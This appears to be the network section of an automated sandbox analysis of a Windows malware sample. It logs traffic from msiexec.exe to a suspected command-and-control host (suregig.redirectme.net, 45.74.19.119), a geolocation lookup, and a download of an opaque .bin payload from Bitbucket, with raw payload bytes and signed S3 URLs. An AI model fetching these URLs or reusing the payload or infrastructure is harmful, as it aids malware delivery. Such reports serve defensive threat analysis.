                                                                                            Jan 3, 2025 05:08:33.556828976 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.556839943 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.556859016 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.556884050 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.556958914 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.556968927 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.556977987 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.556988955 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557003021 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557013988 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557018995 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557046890 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557204008 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557229042 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557240009 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557250023 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557260036 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557271004 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557282925 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557363987 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557374001 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557383060 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557393074 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557409048 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557421923 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557434082 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557457924 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557637930 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557647943 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557657957 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557667971 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557677984 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557687998 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557697058 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557702065 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557707071 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557707071 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557712078 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557723045 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557733059 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.557760954 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.557871103 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558028936 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558049917 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558074951 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558187008 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558198929 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558207989 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558218002 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558228016 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558228970 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558237076 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558267117 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558450937 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558466911 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558476925 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558485985 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558496952 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558509111 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558512926 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558525085 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558536053 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558537006 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558542013 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558547020 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558557034 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558567047 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558573961 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558578014 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.558599949 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.558613062 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.559669971 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.620703936 CET46884978545.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:33.642580032 CET497854688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:33.647377014 CET46884978545.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.756342888 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:34.761414051 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761476994 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761523962 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761527061 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:34.761533976 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761583090 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761610031 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761641026 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:34.761676073 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761809111 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761817932 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.761826038 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766485929 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766658068 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766678095 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766689062 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766817093 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766824961 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.766896009 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.794960976 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:08:34.800163031 CET46884979145.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:08:34.800236940 CET497914688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:09:03.629276991 CET46884978545.74.19.119192.168.2.4
                                                                                            Jan 3, 2025 05:09:03.631798029 CET497854688192.168.2.445.74.19.119
                                                                                            Jan 3, 2025 05:09:03.636619091 CET46884978545.74.19.119192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 3, 2025 05:08:26.826102018 CET5574053192.168.2.41.1.1.1
                                                                                            Jan 3, 2025 05:08:26.833049059 CET53557401.1.1.1192.168.2.4
                                                                                            Jan 3, 2025 05:08:28.539715052 CET6386953192.168.2.41.1.1.1
                                                                                            Jan 3, 2025 05:08:28.566456079 CET53638691.1.1.1192.168.2.4
                                                                                            Jan 3, 2025 05:08:30.929600954 CET5661453192.168.2.41.1.1.1
                                                                                            Jan 3, 2025 05:08:30.940269947 CET53566141.1.1.1192.168.2.4
                                                                                            Jan 3, 2025 05:08:31.862551928 CET5718253192.168.2.41.1.1.1
                                                                                            Jan 3, 2025 05:08:31.869924068 CET53571821.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 3, 2025 05:08:26.826102018 CET192.168.2.41.1.1.10xe5dfStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.539715052 CET192.168.2.41.1.1.10x1398Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:30.929600954 CET192.168.2.41.1.1.10x40f6Standard query (0)suregig.redirectme.netA (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:31.862551928 CET192.168.2.41.1.1.10x771Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 3, 2025 05:08:26.833049059 CET1.1.1.1192.168.2.40xe5dfNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:26.833049059 CET1.1.1.1192.168.2.40xe5dfNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:26.833049059 CET1.1.1.1192.168.2.40xe5dfNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com52.217.199.81A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com16.182.74.1A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com54.231.171.1A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com54.231.161.1A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com52.216.42.129A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com3.5.21.85A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com52.217.10.164A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:28.566456079 CET1.1.1.1192.168.2.40x1398No error (0)s3-w.us-east-1.amazonaws.com52.217.172.185A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:30.940269947 CET1.1.1.1192.168.2.40x40f6No error (0)suregig.redirectme.net45.74.19.119A (IP address)IN (0x0001)false
                                                                                            Jan 3, 2025 05:08:31.869924068 CET1.1.1.1192.168.2.40x771No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                            • bitbucket.org
                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                            • geoplugin.net
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449792178.237.33.50803052C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 3, 2025 05:08:31.875478983 CET71OUTGET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
                                                                                            Jan 3, 2025 05:08:32.499417067 CET1171INHTTP/1.1 200 OK
                                                                                            date: Fri, 03 Jan 2025 04:08:32 GMT
                                                                                            server: Apache
                                                                                            content-length: 963
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449758185.166.143.494433052C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-03 04:08:27 UTC204OUTGET /priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Host: bitbucket.org
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-03 04:08:28 UTC5930INHTTP/1.1 302 Found
                                                                                            Date: Fri, 03 Jan 2025 04:08:28 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Content-Length: 0
                                                                                            Server: AtlassianEdge
                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-48ec-b57d-ae1a3da22a4f/rLjwANQEhWrjdfkI49.bin?response-content-disposition=attachment%3B%20filename%3D%22rLjwANQEhWrjdfkI49.bin%22&AWSAccessKeyId=ASIA6KOSE3BNEMPLKJOT&Signature=denrl5WI4u8FjWNMtnU%2F%2BtpCRUc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEA0aCXVzLWVhc3QtMSJHMEUCIQCqKzbs%2BOWEPFmobPrOeyZUc1Hka9ubfTuCadPzKpFw3gIgALvq%2F5P6hD%2BxuQ9X0zFL%2FBGKklksmRNdtlaJzjgVucAqsAII5f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDF5scx4lOoz0g6WvpCqEAhPpoCSHiRQQLbYcpaMC4OeyGBD0PMJKZ9jxeXAgJxA7UQK8pvQ6V7hxNUoNZOr0AqSTJj9r3vYyzNgTtqLlnLY%2BM3wtv86esET39Qf41l487vCExk%2FdTTu98BKXs9EkqGzAfgUD0ye6tlzH1H95oU8C8n%2FHNBBozdA6WGWl8qse7nXhiNOvPaDwdwRQULwrfdC9twiJElPX6QBdntBuMO7kJYuzcuV51wll8wA3yFvls8Za%2Bm3vtDr6rFlJa2DigeU8stNaWM9Kgikkvj5UQURvpj6GuiH7cbTsXzl%2FHlIoVy1%2FBSy%2BkEwwBrC6pEk%2Ffmp7YZFiEDKNia0T2PUe9bvMYZ9dMLzF3bsGOp0BiM71ugHYhoWE9WZdJHVbSgDbAgXBDf5fbLKmzvWjlDLrlx2sZeV1mQpH5uAThXlvpvKVTJqLzR5wIcryr2v6e [TRUNCATED]
                                                                                            Expires: Fri, 03 Jan 2025 04:08:28 GMT
                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                            X-Used-Mesh: False
                                                                                            Vary: Accept-Language, Origin
                                                                                            Content-Language: en
                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                            X-Dc-Location: Micros-3
                                                                                            X-Served-By: 109756c1955e
                                                                                            X-Version: c9b3998323c0
                                                                                            X-Static-Version: c9b3998323c0
                                                                                            X-Request-Count: 35
                                                                                            X-Render-Time: 0.623708963394165
                                                                                            X-B3-Traceid: 2813c506dca24d768b81e48630b6ca5f
                                                                                            X-B3-Spanid: 7f7125b803a19b0c
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                            X-Usage-Quota-Remaining: 985201.808
                                                                                            X-Usage-Request-Cost: 14972.80
                                                                                            X-Usage-User-Time: 0.375700
                                                                                            X-Usage-System-Time: 0.073484
                                                                                            X-Usage-Input-Ops: 0
                                                                                            X-Usage-Output-Ops: 0
                                                                                            Age: 0
                                                                                            X-Cache: MISS
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Xss-Protection: 1; mode=block
                                                                                            Atl-Traceid: 2813c506dca24d768b81e48630b6ca5f
                                                                                            Atl-Request-Id: 2813c506-dca2-4d76-8b81-e48630b6ca5f
                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                            Server-Timing: atl-edge;dur=737,atl-edge-internal;dur=3,atl-edge-upstream;dur=735,atl-edge-pop;desc="aws-eu-central-1"
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.44976952.217.199.814433052C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-03 04:08:29 UTC1334OUTGET /867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-48ec-b57d-ae1a3da22a4f/rLjwANQEhWrjdfkI49.bin?response-content-disposition=attachment%3B%20filename%3D%22rLjwANQEhWrjdfkI49.bin%22&AWSAccessKeyId=ASIA6KOSE3BNEMPLKJOT&Signature=denrl5WI4u8FjWNMtnU%2F%2BtpCRUc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEA0aCXVzLWVhc3QtMSJHMEUCIQCqKzbs%2BOWEPFmobPrOeyZUc1Hka9ubfTuCadPzKpFw3gIgALvq%2F5P6hD%2BxuQ9X0zFL%2FBGKklksmRNdtlaJzjgVucAqsAII5f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDF5scx4lOoz0g6WvpCqEAhPpoCSHiRQQLbYcpaMC4OeyGBD0PMJKZ9jxeXAgJxA7UQK8pvQ6V7hxNUoNZOr0AqSTJj9r3vYyzNgTtqLlnLY%2BM3wtv86esET39Qf41l487vCExk%2FdTTu98BKXs9EkqGzAfgUD0ye6tlzH1H95oU8C8n%2FHNBBozdA6WGWl8qse7nXhiNOvPaDwdwRQULwrfdC9twiJElPX6QBdntBuMO7kJYuzcuV51wll8wA3yFvls8Za%2Bm3vtDr6rFlJa2DigeU8stNaWM9Kgikkvj5UQURvpj6GuiH7cbTsXzl%2FHlIoVy1%2FBSy%2BkEwwBrC6pEk%2Ffmp7YZFiEDKNia0T2PUe9bvMYZ9dMLzF3bsGOp0BiM71ugHYhoWE9WZdJHVbSgDbAgXBDf5fbLKmzvWjlDLrlx2sZeV1mQpH5uAThXlvpvKVTJqLzR5wIcryr2v6eSSA3b8h1YgFF6rWL09WXSQ1pKOD%2Ffk8%2B5aHub6hK [TRUNCATED]
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-03 04:08:29 UTC551INHTTP/1.1 200 OK
                                                                                            x-amz-id-2: DJ1MEo8Q/ELYH2Flx0o6hOoZJjn/eEqZzkaaxwBIkv7WORyRulcDlNsFKC5Ltfr657GVX655x6k=
                                                                                            x-amz-request-id: 6KEHTPRSA60T5KH6
                                                                                            Date: Fri, 03 Jan 2025 04:08:30 GMT
                                                                                            Last-Modified: Tue, 24 Dec 2024 19:26:41 GMT
                                                                                            ETag: "4ce4b64db95dbec80bd72701c9ac21f8"
                                                                                            x-amz-server-side-encryption: AES256
                                                                                            x-amz-version-id: iBKFGGYts8ekpFol_xi.VMbSKObHfEi4
                                                                                            Content-Disposition: attachment; filename="rLjwANQEhWrjdfkI49.bin"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 493120
                                                                                            Server: AmazonS3
                                                                                            Connection: close
                                                                                            2025-01-03 04:08:29 UTC16384INData Raw: e1 75 53 fb 49 55 cf 0e b0 f6 12 51 f7 95 5d 3d 5f 88 81 2b 54 e0 a5 31 e1 d3 88 91 7c d9 a8 8f 68 3d 8c a9 52 0f 52 4f 5c 30 9a 95 14 b1 92 1f 5f 3b 90 9d 3c ae 4e 13 f8 99 18 d7 2b 46 9f e8 77 36 65 77 07 5d c0 69 15 51 b3 fa d6 f6 c5 78 76 67 3c 2f cb 4f a7 98 a1 48 95 89 13 7b a3 fc e4 42 44 75 63 a5 6c 6b 44 2b cf 8b 7e 8a fe 1a 91 4c 47 c1 dd a1 35 9b e6 e0 bf 79 76 e6 0c b0 e2 7f 44 d7 bd f8 ca 09 ae 5b b1 c1 ea f4 60 73 86 7f e9 df 2c 8f 5f 29 ca d4 5c 2d 7c 4e 6a 17 a8 15 ee 29 c9 23 b7 3a 69 02 29 83 85 c8 92 04 bd 5d a2 40 a1 36 b1 47 f9 66 0a e6 a9 72 4d 91 c5 e0 2f 88 09 c0 f0 c2 d8 e5 3f 83 a6 25 d0 19 bb d6 79 35 f9 68 c0 e4 da 3f 44 77 1d 16 1a d9 a3 2c 16 ae 96 1a 39 68 a5 23 45 32 a3 52 10 41 e7 4d 8f 8d d4 a7 a6 50 f0 6c 45 62 63 aa 80
                                                                                            Data Ascii: uSIUQ]=_+T1|h=RRO\0_;<N+Fw6ew]iQxvg</OH{BDuclkD+~LG5yvD[`s,_)\-|Nj)#:i)]@6GfrM/?%y5h?Dw,9h#E2RAMPlEbc
                                                                                            2025-01-03 04:08:29 UTC473INData Raw: a3 d8 48 99 c2 1a 96 7d 1a 91 03 fe 37 39 a9 85 5e 36 9f fb cc 17 e2 c5 e1 fe 6e 18 6b 93 51 59 df 50 c6 0c 6f 53 55 9a c2 8f 92 54 8e ef cb fb 8e 3e 1c 03 d5 76 17 8f 45 76 fc e5 d0 72 a1 bf 7e 46 13 4c 4b 3f b7 30 52 b1 a0 a6 11 a0 65 32 90 6a 1f 26 07 d4 ec 49 81 b0 e8 be fa cb c2 5e 5d a3 9e 0b 80 c2 3b 67 b0 81 b3 61 db 02 8f f1 2a c3 87 c2 b2 e4 73 b3 2a 80 57 0f 5a 24 ba 58 a5 3c 76 5c 3d ac 05 10 ed 9c cc 60 73 67 8b c2 1d 17 05 2a ef 3a 86 54 dc 9f 04 24 9a b2 fd af c1 82 d3 ce bf 51 6e f6 43 05 b6 13 b0 80 29 3e 6e cf a0 97 7a 8c ea 70 a5 01 4d b8 54 f0 c4 f6 f9 03 0b c0 52 34 34 46 5c 3b a0 32 81 f4 79 99 4b a2 ff 00 84 36 ce ac d6 c5 93 4f 73 d0 6e 1a cb 0d 81 fe a0 c2 5d 4a 43 0a 0a 70 11 2b 46 d2 72 d6 ad 7c 8d fe d9 e4 af b3 27 f0 1a 18 06
                                                                                            Data Ascii: H}79^6nkQYPoSUT>vEvr~FLK?0Re2j&I^];ga*s*WZ$X<v\=`sg*:T$QnC)>nzpMTR44F\;2yK6Osn]JCp+Fr|'
                                                                                            2025-01-03 04:08:29 UTC16384INData Raw: 9f 0c c2 a3 63 17 ff ff 54 d2 56 30 23 e1 bf b5 d6 26 e9 e9 b7 1f df 4e 77 0b 8e 28 25 1a 05 8c 9c f2 45 ff fb 48 75 96 db 74 b5 de 4a e0 58 55 7c 3f f3 1c 20 4b fd ad 76 ff b8 04 26 13 6d 71 1a 32 aa 78 f2 2d 9d af e1 f6 ea ab 36 92 b0 8c 17 a9 a0 d4 d1 71 eb f9 04 ff 48 ef ef fc 45 2d 7f 36 e9 14 43 6d e7 68 51 e5 12 9b 15 f5 90 b1 20 ae 8f 32 ae 17 15 30 bc eb fb 32 c1 68 97 40 85 ad 06 31 42 cb 0c ed b8 c4 ff 2a c8 0f 14 49 c7 8a 23 83 bc 3a 9a de 3e 4a fc 87 fa e9 10 59 d0 77 2c c1 fc 78 4c c9 8a 23 3c c2 d9 2a 2c c9 69 7c 3a ac 97 5f 64 4d 7a ee 09 6c 3d 42 aa e4 5f 84 ab e5 f5 60 15 59 d6 aa e5 36 b9 01 fd 3d 93 5e 7d c0 ee 95 1f 1d 27 8a b0 2e 3b 5d f8 c9 76 9e ed 8b 89 4e 3f 9a 1d c1 e6 f7 06 b1 88 30 7d 70 b3 b2 02 b3 79 94 0a 37 24 52 a9 52 d2
